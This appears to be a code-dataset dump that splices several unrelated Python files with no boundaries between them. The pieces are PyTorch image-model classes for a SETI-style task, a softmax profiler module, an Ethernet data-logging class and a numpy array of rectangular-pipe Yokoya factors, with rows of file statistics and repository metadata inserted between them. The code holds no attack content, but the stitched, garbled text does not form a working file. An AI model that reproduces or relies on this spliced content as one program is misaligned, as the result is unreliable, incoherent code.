self.fc1 = nn.Linear(dim2, 1)
self.init_weights()
def init_weights(self):
head_bias = 0.
trunc_normal_(self.pos_embed, std=.02)
def forward(self, x):
x = self.model.forward_features(x)
b, c, h, w = x.shape
x = x.mean(3)
x = x.view(b, c, -1).contiguous()
x = x.permute(0, 2, 1).contiguous()
x = self.fc0(x)
x = x + self.drop(self.attn(self.norm1(x + self.pos_embed)))
x = x.mean(1)
return self.fc1(self.drop(x))
class Hybrid5eBB(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model(hparams['backbone'], pretrained=True, in_chans=3, num_classes=1)
# del self.model.classifier
dim1 = self.model.num_features
dim2 = 512
self.fc0 = nn.Linear(dim1, dim2)
self.attn = Attention(dim2, 2)
self.norm1 = nn.LayerNorm(dim2)
self.pos_embed = nn.Parameter(torch.zeros(1, 24 * 16, dim2))
self.flat = nn.Flatten()
self.drop = nn.Dropout(hparams['dropout'])
self.fc1 = nn.Linear(dim2, 1)
self.init_weights()
def init_weights(self):
head_bias = 0.
trunc_normal_(self.pos_embed, std=.02)
def forward(self, x):
x = self.model.forward_features(x)
b, c, h, w = x.shape
# x = x.mean(3)
x = x.view(b, c, -1).contiguous()
x = x.permute(0, 2, 1).contiguous()
x = self.fc0(x)
x = x + self.drop(self.attn(self.norm1(x + self.pos_embed)))
x = x.mean(1)
return self.fc1(self.drop(x))
class Hybrid6BB(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model(hparams['backbone'], pretrained=True, in_chans=3, num_classes=1)
# del self.model.classifier
dim1 = self.model.num_features
dim2 = 512
self.fc0 = nn.Linear(dim1, dim2)
self.attn = Attention(dim2, 2)
self.norm1 = nn.LayerNorm(dim2)
self.pos_embed = nn.Parameter(torch.zeros(1, 32, dim2))
self.flat = nn.Flatten()
self.drop = nn.Dropout(hparams['dropout'])
self.fc1 = nn.Linear(dim2, 1)
self.init_weights()
def init_weights(self):
head_bias = 0.
trunc_normal_(self.pos_embed, std=.02)
def forward(self, x):
x = self.model.forward_features(x)
b, c, h, w = x.shape
x = x.mean(3)
x = x.view(b, c, -1).contiguous()
x = x.permute(0, 2, 1).contiguous()
x = self.fc0(x)
x = x + self.drop(self.attn(self.norm1(x + self.pos_embed)))
x = x.mean(1)
return self.fc1(self.drop(x))
class HybridFeatures(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model(hparams['backbone'], pretrained=True, in_chans=3, num_classes=1)
# del self.model.classifier
dim1 = self.model.num_features
dim2 = 256
self.fc0 = nn.Linear(dim1, dim2)
self.attn = Attention(dim2, 1)
self.norm1 = nn.LayerNorm(dim2)
self.pos_embed = nn.Parameter(torch.zeros(1, 256, dim2))
self.flat = nn.Flatten()
self.drop = nn.Dropout(hparams['dropout'])
self.fc1 = nn.Linear(dim2, 1)
self.init_weights()
def init_weights(self):
head_bias = 0.
trunc_normal_(self.pos_embed, std=.02)
def forward(self, x):
x = self.model.forward_features(x)
b, c, h, w = x.shape
x = x.view(b, c, -1).contiguous()
x = x.permute(0, 2, 1).contiguous()
x = self.fc0(x)
x = x + self.drop(self.attn(self.norm1(x + self.pos_embed)))
x = x.mean(1)
return x
class Simple3Features(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model(hparams['backbone'], pretrained=True, in_chans=3, num_classes=1)
# del self.model.classifier
self.avg = nn.AdaptiveAvgPool2d((1, 1))
self.flat = nn.Flatten()
self.drop = nn.Dropout(hparams['dropout'])
self.fc1 = nn.Linear(self.model.num_features, 1)
def forward(self, x):
x = self.model.forward_features(x)
return self.flat(self.avg(x))
class MultiBB(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model(hparams['backbone'], pretrained=True, in_chans=3, num_classes=1)
# 128 * 512 x 6
dim1 = self.model.num_features
dim2 = 512
self.fc0 = nn.Linear(dim1, dim2)
self.attn = Attention(dim2, 2)
self.norm1 = nn.LayerNorm(dim2)
self.pos_embed = nn.Parameter(torch.zeros(1, 384, dim2))
self.flat = nn.Flatten()
self.drop = nn.Dropout(hparams['dropout'])
self.fc1 = nn.Linear(dim2, 1)
self.init_weights()
def init_weights(self):
head_bias = 0.
trunc_normal_(self.pos_embed, std=.02)
def forward(self, x):
b, n, c, h, w = x.shape
outs = []
for i in range(n):
out = self.model.forward_features(x[:, i]) # b x c x 4 x 16
out = out.view(out.shape[0], out.shape[1], -1) # b x c x 64
out = out.permute(0, 2, 1).contiguous()
out = self.fc0(out) # b x 64 x 512
outs.append(out)
x = torch.cat(outs, 1) # b x 384 x 512
x = x + self.drop(self.attn(self.norm1(x + self.pos_embed)))
x = x.mean(1)
return self.fc1(self.drop(x))
class BackgroundAttenuation(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model(hparams['backbone'], pretrained=True, in_chans=1, num_classes=1)
del self.model.classifier
self.avg = nn.AdaptiveAvgPool2d((1, 1))
self.flat = nn.Flatten()
self.drop = nn.Dropout(hparams['dropout'])
self.bn2 = nn.BatchNorm2d(320)
self.fc1 = nn.Linear(320, 1)
def forward(self, x1, x2):
x1 = self.model.conv_stem(x1)
x2 = self.model.conv_stem(x2)
x2attn = torch.sigmoid(x2)
x1 = x1 * (1 - x2attn)
x1 = self.model.blocks(self.model.act1(self.model.bn1(x1)))
x2 = self.model.blocks(self.model.act2(self.model.bn1(x2)))
x1 = x1 * (1 - torch.sigmoid(x2))
x1 = self.model.global_pool(self.model.act2(self.bn2(x1)))
return self.fc1(self.drop(x1))
class TfmBB(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model(hparams['backbone'], pretrained=True, num_classes=1)
def forward(self, x):
return self.model(x)
class Ch2(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model(hparams['backbone'], pretrained=True, in_chans=2, num_classes=1)
def forward(self, x):
return self.model(x)
class SimpleStride1(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model(hparams['backbone'], pretrained=True, in_chans=1, num_classes=1)
self.model.conv_stem.stride = (1, 1)
# del self.model.classifier
self.avg = nn.AdaptiveAvgPool2d((1, 1))
self.flat = nn.Flatten()
self.fc1 = nn.Linear(self.model.num_features, 1)
def forward(self, x):
x = self.model.forward_features(x)
return self.fc1(self.flat(self.avg(x)))
class SimpleSum(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model(hparams['backbone'], pretrained=True, in_chans=1, num_classes=1)
self.model.conv_stem.stride = (2, 1)
del self.model.classifier
self.avg = nn.AdaptiveAvgPool2d((1, 1))
self.flat = nn.Flatten()
self.fc1 = nn.Linear(self.model.num_features, 1)
def forward(self, x):
x = self.model.forward_features(x)
x = x.mean(2).mean(2)
return self.fc1(x)
class EffMod(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model('tf_efficientnet_b0_ns', pretrained=True, in_chans=1, num_classes=1)
del self.model.classifier, self.model.conv_head
self.fc1 = nn.Linear(320, 1)
def forward(self, x):
x = self.model.conv_stem(x)
x = self.model.bn1(x)
x = self.model.act1(x)
x = self.model.blocks(x)
return self.fc1(self.model.global_pool(x))
class SimpleBB2(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model('resnest14d', pretrained=True, in_chans=1, num_classes=1)
self.model.conv1.kernel = (11, 3)
# del self.model.classifier
self.avg = nn.AdaptiveAvgPool2d((1, 1))
self.flat = nn.Flatten()
self.fc1 = nn.Linear(self.model.num_features, 1)
def forward(self, x):
x = self.model.forward_features(x)
return self.fc1(self.flat(self.avg(x)))
class MaxMeanBB(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model(hparams['backbone'], pretrained=True, in_chans=1, num_classes=1)
del self.model.classifier
self.avg = nn.AdaptiveAvgPool2d((1, 1))
self.flat = nn.Flatten()
self.fc1 = nn.Linear(self.model.num_features, 1)
def forward(self, x):
x = self.model.forward_features(x)
x = x.max(2)[0]
x = x.mean(2)
return self.fc1(self.flat(x))
class Ch3(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model(hparams['backbone'], pretrained=True, num_classes=1)
del self.model.classifier
self.avg = nn.AdaptiveAvgPool2d((1, 1))
self.flat = nn.Flatten()
self.drop = nn.Dropout(p=hparams['dropout'])
self.fc1 = nn.Linear(self.model.num_features, 1)
def forward(self, x):
x = self.model.forward_features(x)
return self.fc1(self.drop(self.flat(self.avg(x))))
class Ch6(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model(hparams['backbone'], pretrained=True, num_classes=1)
del self.model.classifier
self.avg = nn.AdaptiveAvgPool2d((1, 1))
self.max = nn.AdaptiveMaxPool2d((1, 1))
self.flat = nn.Flatten()
self.drop = nn.Dropout(p=hparams['dropout'])
self.fc1 = nn.Linear(self.model.num_features * 2, 1)
def forward(self, x):
x1 = self.model.forward_features(x[:, :3])
x2 = self.model.forward_features(x[:, 3:])
x1 = self.flat(self.avg(x1) + self.max(x1))
x2 = self.flat(self.avg(x2) + self.max(x2))
x = torch.cat((x1, x2), -1)
return self.fc1(self.drop(x))
class SetiCNN9(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.conv1 = nn.Conv2d(1, 24, kernel_size=(34, 3), stride=(2, 1), padding=(1, 1), bias=False)
self.bn1 = nn.BatchNorm2d(24, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
self.act1 = nn.SiLU(inplace=True)
block1 = []
for _ in range(3):
layer = nn.Sequential(
nn.Conv2d(24, 24, kernel_size=(7, 3), stride=(1, 1), padding=(1, 1), bias=False),
nn.BatchNorm2d(24, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True),
nn.SiLU(inplace=True)
)
block1.append(layer)
self.block1 = nn.Sequential(*block1)
self.block2 = nn.Sequential(
nn.Conv2d(24, 96, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False),
nn.BatchNorm2d(96, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True),
nn.SiLU(inplace=True),
nn.Conv2d(96, 144, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False),
nn.BatchNorm2d(144, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True),
nn.SiLU(inplace=True),
nn.Conv2d(144, 144, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False),
nn.BatchNorm2d(144, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True),
nn.SiLU(inplace=True),
nn.Conv2d(144, 256, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False),
nn.BatchNorm2d(256, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True),
nn.SiLU(inplace=True),
nn.Conv2d(256, 1024, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False),
nn.BatchNorm2d(1024, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True),
nn.SiLU(inplace=True)
)
self.mean = nn.AdaptiveAvgPool2d((1, 1))
self.flat = nn.Flatten()
self.fc = nn.Linear(1024, 1)
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.act1(x)
x = self.block1(x)
x = self.block2(x)
x = self.mean(x)
return self.fc(self.flat(x))
class Ch3Effb7stem(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
model1 = timm.create_model('tf_efficientnetv2_l_in21k')
self.model = timm.create_model(hparams['backbone'], pretrained=True, num_classes=1)
self.model.conv_stem = model1.conv_stem
self.bn1 = model1.bn1
del model1
del self.model.classifier
self.avg = nn.AdaptiveAvgPool2d((1, 1))
self.flat = nn.Flatten()
self.fc1 = nn.Linear(self.model.num_features, 1)
def forward(self, x):
x = self.model.forward_features(x)
return self.fc1(self.flat(self.avg(x)))
class Ch6(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model(hparams['backbone'], pretrained=True, num_classes=1, in_chans=6)
def forward(self, x):
x = self.model(x)
return x
class Ch9(nn.Module):
def __init__(self, hparams: dict):
super().__init__()
self.model = timm.create_model(hparams['backbone'], pretrained=True, in_chans=9)
self.mean = nn.AdaptiveAvgPool2d((1, 1))
self.drop = nn.Dropout(hparams['dropout'])
self.fc = nn.Linear(self.model.num_features, 1)
def forward(self, x):
x = self.model.forward_features(x)
x = self.mean(x)
x = x.view(x.size()[0], -1)
x = self.drop(x)
return self.fc(x)
| 35.398637 | 107 | 0.594543 | 2,960 | 20,779 | 4.023311 | 0.065541 | 0.084642 | 0.019145 | 0.034008 | 0.845159 | 0.813922 | 0.80796 | 0.794861 | 0.791586 | 0.779243 | 0 | 0.043627 | 0.256509 | 20,779 | 586 | 108 | 35.459044 | 0.727232 | 0.027047 | 0 | 0.710638 | 0 | 0 | 0.017431 | 0.002278 | 0 | 0 | 0 | 0 | 0 | 1 | 0.129787 | false | 0 | 0.010638 | 0.004255 | 0.255319 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4271a8d9497b5ada64108c710341bba504b2037b | 2,190 | py | Python | apex/pyprof/prof/softmax.py | oyj0594/apex | b66ffc1d952d0b20d6706ada783ae5b23e4ee734 | [
"BSD-3-Clause"
] | 6,523 | 2018-04-25T17:35:27.000Z | 2022-03-31T22:49:45.000Z | apex/pyprof/prof/softmax.py | oyj0594/apex | b66ffc1d952d0b20d6706ada783ae5b23e4ee734 | [
"BSD-3-Clause"
] | 1,100 | 2018-05-18T00:03:34.000Z | 2022-03-30T22:00:33.000Z | apex/pyprof/prof/softmax.py | oyj0594/apex | b66ffc1d952d0b20d6706ada783ae5b23e4ee734 | [
"BSD-3-Clause"
] | 1,057 | 2018-05-07T13:53:04.000Z | 2022-03-31T09:18:47.000Z | from collections import OrderedDict
from .utility import Utility
from .base import OperatorLayerBase
class Softmax(OperatorLayerBase):
def __init__(self, d):
marker = eval(d.argMarker[0])
mod = marker['mod']
op = marker['op']
args = marker['args']
self.marker = marker
self.mod_ = mod
self.op_ = op
self.args = args
assert (mod == "torch.nn.functional")
assert (op == "softmax")
#Filter out named parameters
args = list(filter(lambda x : x['name'] == '', args))
assert (len(args) <= 2)
self.shape = args[0]['shape']
self.type = args[0]['dtype']
self.dir = d.dir
return
def op(self):
return self.op_
def mod(self):
return self.mod_
def tc(self):
return "-"
def params(self):
p = OrderedDict([('T', self.shape), ('type', self.type)])
return p
def elems(self):
return Utility.numElems(self.shape)
def flops(self):
# Note: exp, sum-reduce, divide
#flops = elems * 3
return 0
def bytes(self):
b = self.elems() * Utility.typeToBytes(self.type)
b *= 3 if self.dir == "fprop" else 5 #verify
return b
class LogSoftmax(OperatorLayerBase):
def __init__(self, d):
marker = eval(d.argMarker[0])
mod = marker['mod']
op = marker['op']
args = marker['args']
self.marker = marker
self.mod_ = mod
self.op_ = op
self.args = args
assert (mod == "torch.nn.functional")
assert (op == "log_softmax")
#Filter out named parameters
args = list(filter(lambda x : x['name'] == '', args))
assert (len(args) <= 2)
#Get input
if (args[0]['name'] == ""):
i = args[0]
else:
i = list(filter(lambda x : x['name'] == "input", args))[0]
t = i['dtype']
self.shape = i['shape']
self.type = i['dtype']
self.dir = d.dir
return
def op(self):
return self.op_
def mod(self):
return self.mod_
def tc(self):
return "-"
def params(self):
p = OrderedDict([('T', self.shape), ('type', self.type)])
return p
def elems(self):
return Utility.numElems(self.shape)
def flops(self):
# Note: exp, sum-reduce, divide, log
#flops = elems * 4
return 0
def bytes(self):
b = self.elems() * Utility.typeToBytes(self.type)
b *= 3 if self.dir == "fprop" else 5 #verify
return b
| 18.87931 | 61 | 0.623744 | 321 | 2,190 | 4.202492 | 0.205607 | 0.059303 | 0.041512 | 0.037806 | 0.818384 | 0.818384 | 0.802076 | 0.802076 | 0.802076 | 0.802076 | 0 | 0.00981 | 0.208676 | 2,190 | 115 | 62 | 19.043478 | 0.768609 | 0.079452 | 0 | 0.794872 | 0 | 0 | 0.070752 | 0 | 0 | 0 | 0 | 0 | 0.076923 | 1 | 0.205128 | false | 0 | 0.038462 | 0.128205 | 0.474359 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 9 |
42a4040aa17b8842b86678f829c0814fa4a90696 | 1,881 | py | Python | src/aceinna/devices/widgets/ethernet_data_logger.py | lihaiyong827/python-openimu | f1c536ba4182aaeabd87b63c08ebd92f97e8dbb4 | [
"Apache-2.0"
] | 41 | 2018-07-20T17:30:33.000Z | 2022-02-24T08:17:39.000Z | src/aceinna/devices/widgets/ethernet_data_logger.py | lihaiyong827/python-openimu | f1c536ba4182aaeabd87b63c08ebd92f97e8dbb4 | [
"Apache-2.0"
] | 52 | 2018-06-25T22:15:14.000Z | 2022-03-10T07:30:56.000Z | src/aceinna/devices/widgets/ethernet_data_logger.py | lihaiyong827/python-openimu | f1c536ba4182aaeabd87b63c08ebd92f97e8dbb4 | [
"Apache-2.0"
] | 31 | 2018-12-19T00:10:08.000Z | 2022-03-19T02:14:03.000Z | import time
import json
class EthernetDataLogger:
def __init__(self, properties, communicator, log_writer):
self.log_writer = log_writer
self.communicator = communicator
def run(self):
''' start to log data from Ethernet '''
print('start to log data from Ethernet\n')
self._read_and_write()
def _read_and_write(self):
while True:
read_data = self.communicator.read()
if read_data:
self.log_writer.write(read_data)
pass
class EthernetDebugDataLogger:
def __init__(self, properties, communicator, log_writer):
self.log_writer = log_writer
self.communicator = communicator
def run(self):
''' start to log data from lan port '''
print('start to log debug data from Ethernet\n')
self._read_and_write()
def _read_and_write(self):
# send get configuration
while True:
try:
read_data = self.communicator.read()
if read_data:
self.log_writer.write(read_data)
except Exception as e:
print('Data Log Failed, exit')
pass
class EthernetRTCMDataLogger:
def __init__(self, properties, communicator, log_writer):
self.log_writer = log_writer
self.communicator = communicator
def run(self):
print('start to log RTCM data from Ethernet\n')
self._read_and_write()
def _read_and_write(self):
# send get configuration
print('------------------------------------------------------------')
while True:
try:
read_data = self.communicator.read()
if read_data:
self.log_writer.write(read_data)
except Exception as e:
print('Data Log Failed, exit')
pass
| 29.857143 | 77 | 0.573099 | 208 | 1,881 | 4.9375 | 0.206731 | 0.105161 | 0.075949 | 0.061344 | 0.83739 | 0.83739 | 0.819864 | 0.819864 | 0.819864 | 0.819864 | 0 | 0 | 0.320574 | 1,881 | 62 | 78 | 30.33871 | 0.803599 | 0.059543 | 0 | 0.8125 | 0 | 0 | 0.120798 | 0.034188 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1875 | false | 0.0625 | 0.041667 | 0 | 0.291667 | 0.125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
c42ccff53aa5da04c2d0fc4ecc1302051618b2cb | 25,070 | py | Python | pytlwall/yokoya_factors/rect_long.py | tatianarijoff/tlwall | 127731fdb5908c3ab515432fe112cfb07d75b9e0 | [
"MIT"
] | null | null | null | pytlwall/yokoya_factors/rect_long.py | tatianarijoff/tlwall | 127731fdb5908c3ab515432fe112cfb07d75b9e0 | [
"MIT"
] | null | null | null | pytlwall/yokoya_factors/rect_long.py | tatianarijoff/tlwall | 127731fdb5908c3ab515432fe112cfb07d75b9e0 | [
"MIT"
] | null | null | null | import numpy as np
rect_long = np.array([
1.000,
0.995,
0.990,
0.985,
0.984,
0.984,
0.983,
0.982,
0.981,
0.981,
0.980,
0.980,
0.980,
0.978,
0.977,
0.976,
0.974,
0.974,
0.973,
0.972,
0.972,
0.971,
0.971,
0.970,
0.969,
0.968,
0.968,
0.967,
0.966,
0.965,
0.964,
0.963,
0.963,
0.962,
0.961,
0.960,
0.960,
0.959,
0.959,
0.958,
0.958,
0.958,
0.957,
0.957,
0.957,
0.955,
0.954,
0.952,
0.951,
0.950,
0.949,
0.949,
0.948,
0.948,
0.948,
0.947,
0.947,
0.946,
0.946,
0.946,
0.946,
0.946,
0.945,
0.945,
0.944,
0.944,
0.944,
0.943,
0.942,
0.941,
0.941,
0.940,
0.940,
0.940,
0.940,
0.940,
0.940,
0.939,
0.938,
0.937,
0.937,
0.937,
0.937,
0.937,
0.937,
0.937,
0.936,
0.936,
0.935,
0.935,
0.934,
0.934,
0.934,
0.934,
0.934,
0.933,
0.933,
0.933,
0.932,
0.932,
0.931,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.929,
0.929,
0.928,
0.928,
0.927,
0.927,
0.927,
0.927,
0.927,
0.926,
0.926,
0.926,
0.926,
0.926,
0.926,
0.926,
0.926,
0.926,
0.926,
0.926,
0.926,
0.926,
0.926,
0.926,
0.926,
0.926,
0.926,
0.926,
0.927,
0.927,
0.927,
0.927,
0.927,
0.927,
0.926,
0.926,
0.926,
0.926,
0.926,
0.926,
0.926,
0.927,
0.927,
0.927,
0.926,
0.926,
0.926,
0.926,
0.927,
0.927,
0.927,
0.927,
0.928,
0.929,
0.929,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.930,
0.931,
0.931,
0.932,
0.932,
0.933,
0.933,
0.934,
0.934,
0.935,
0.935,
0.935,
0.935,
0.935,
0.935,
0.935,
0.935,
0.935,
0.935,
0.936,
0.936,
0.936,
0.937,
0.937,
0.937,
0.937,
0.938,
0.938,
0.938,
0.938,
0.938,
0.938,
0.938,
0.938,
0.938,
0.938,
0.938,
0.939,
0.939,
0.940,
0.940,
0.940,
0.940,
0.940,
0.940,
0.940,
0.940,
0.941,
0.940,
0.941,
0.941,
0.942,
0.942,
0.943,
0.943,
0.944,
0.944,
0.945,
0.945,
0.945,
0.945,
0.945,
0.945,
0.945,
0.946,
0.947,
0.948,
0.948,
0.948,
0.948,
0.948,
0.948,
0.949,
0.949,
0.949,
0.950,
0.950,
0.951,
0.952,
0.953,
0.953,
0.953,
0.953,
0.953,
0.953,
0.953,
0.953,
0.954,
0.954,
0.954,
0.955,
0.955,
0.955,
0.955,
0.955,
0.955,
0.955,
0.955,
0.956,
0.956,
0.956,
0.956,
0.956,
0.957,
0.958,
0.959,
0.959,
0.959,
0.959,
0.959,
0.959,
0.959,
0.959,
0.959,
0.959,
0.960,
0.960,
0.960,
0.960,
0.960,
0.961,
0.961,
0.962,
0.962,
0.962,
0.962,
0.962,
0.962,
0.962,
0.962,
0.962,
0.962,
0.962,
0.963,
0.963,
0.964,
0.964,
0.965,
0.966,
0.966,
0.967,
0.968,
0.968,
0.968,
0.968,
0.968,
0.968,
0.968,
0.968,
0.968,
0.968,
0.968,
0.968,
0.967,
0.967,
0.968,
0.968,
0.968,
0.969,
0.969,
0.969,
0.970,
0.970,
0.970,
0.970,
0.970,
0.970,
0.970,
0.970,
0.970,
0.970,
0.970,
0.970,
0.970,
0.970,
0.971,
0.971,
0.971,
0.971,
0.971,
0.971,
0.970,
0.971,
0.972,
0.972,
0.973,
0.973,
0.973,
0.973,
0.973,
0.974,
0.974,
0.973,
0.973,
0.973,
0.973,
0.973,
0.974,
0.974,
0.974,
0.974,
0.974,
0.974,
0.974,
0.974,
0.974,
0.975,
0.975,
0.976,
0.976,
0.977,
0.977,
0.977,
0.977,
0.977,
0.977,
0.977,
0.977,
0.977,
0.977,
0.977,
0.977,
0.977,
0.977,
0.977,
0.978,
0.978,
0.978,
0.978,
0.978,
0.978,
0.978,
0.979,
0.979,
0.980,
0.980,
0.981,
0.981,
0.981,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.982,
0.983,
0.983,
0.984,
0.984,
0.984,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.986,
0.986,
0.986,
0.986,
0.986,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.986,
0.986,
0.986,
0.986,
0.986,
0.986,
0.986,
0.986,
0.986,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.984,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.985,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.984,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.984,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.985,
0.984,
0.985,
0.985,
0.986,
0.986,
0.987,
0.987,
0.987,
0.988,
0.988,
0.988,
0.988,
0.988,
0.988,
0.988,
0.988,
0.988,
0.988,
0.988,
0.988,
0.988,
0.988,
0.988,
0.988,
0.988,
0.988,
0.988,
0.988,
0.988,
0.989,
0.989,
0.989,
0.989,
0.990,
0.990,
0.990,
0.990,
0.991,
0.991,
0.991,
0.991,
0.992,
0.992,
0.992,
0.992,
0.992,
0.993,
0.993,
0.993,
0.993,
0.994,
0.994,
0.994,
0.994,
0.995,
0.995,
0.995,
0.995,
0.996,
0.996,
0.996,
0.996,
0.997,
0.997,
0.997,
0.997,
